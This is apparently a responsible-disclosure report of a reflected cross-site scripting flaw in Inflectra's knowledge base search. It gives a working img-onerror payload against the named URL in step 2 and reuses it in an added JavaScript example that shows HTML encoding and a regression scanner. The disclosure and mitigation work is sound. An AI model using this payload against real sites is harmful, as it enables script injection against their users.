Vulnerability: Reflected Cross-Site Scripting (XSS)
Vuln URL: http://www.inflectra.com/Support/KnowledgeBase/List.aspx
Steps:
1. Browse URL -> http://www.inflectra.com/Support/KnowledgeBase/List.aspx
2. Enter the following payload in the search box:
"><img src=: '"><img src=a onerror=prompt(document.domain);>
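The mitigation for this class of bug, as an added example that is not part of the original report and is not Inflectra's code: the search term is HTML-encoded before it is written back into the page, and a small scanner confirms the reflected value no longer opens new elements. The rendering functions, the field name q and the scanner are assumptions for illustration; the payload is the one from step 2.

```javascript
// Added example; renderUnsafe/renderSafe are hypothetical, not Inflectra's code.
// Constructed sample input: the payload quoted in step 2 of the report.
const PAYLOAD = `"><img src=: '"><img src=a onerror=prompt(document.domain);>`;

// Assumed vulnerable pattern: search term concatenated into a quoted attribute.
function renderUnsafe(term) {
  return `<input type="text" name="q" value="${term}">`;
}

// Encode the characters that are significant in HTML text and attribute values.
function encodeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(term) {
  return `<input type="text" name="q" value="${encodeHtmlAttr(term)}">`;
}

// Simplified tag scanner (not a full HTML parser): returns the names of the
// elements opened in `html`. A quote only starts an attribute value right
// after '=', so '<' and '>' inside a quoted value are not treated as markup.
function openedTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    const m = html[i] === '<' ? /^[a-zA-Z][a-zA-Z0-9]*/.exec(html.slice(i + 1)) : null;
    if (!m) { i++; continue; }
    tags.push(m[0].toLowerCase());
    let j = i + 1 + m[0].length, quote = null, afterEq = false;
    for (; j < html.length; j++) {
      const c = html[j];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '>') break;
      else if (c === '=') afterEq = true;
      else if ((c === '"' || c === "'") && afterEq) { quote = c; afterEq = false; }
      else if (!/\s/.test(c)) afterEq = false;
    }
    i = j + 1;
  }
  return tags;
}

// Regression check for a test suite: the reflected term must add no elements.
function reflectionEscapes(html) {
  return openedTags(html).length > 1;
}

console.log(openedTags(renderUnsafe(PAYLOAD)), openedTags(renderSafe(PAYLOAD)));
```

In ASP.NET the equivalent encoding step is HttpUtility.HtmlAttributeEncode or the <%: %> syntax, applied at the point where the value is written into the response.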
The Inflectra team acknowledged me for disclosing security issues to them.
Check here -> https://www.inflectra.com/company/responsible-disclosure.aspx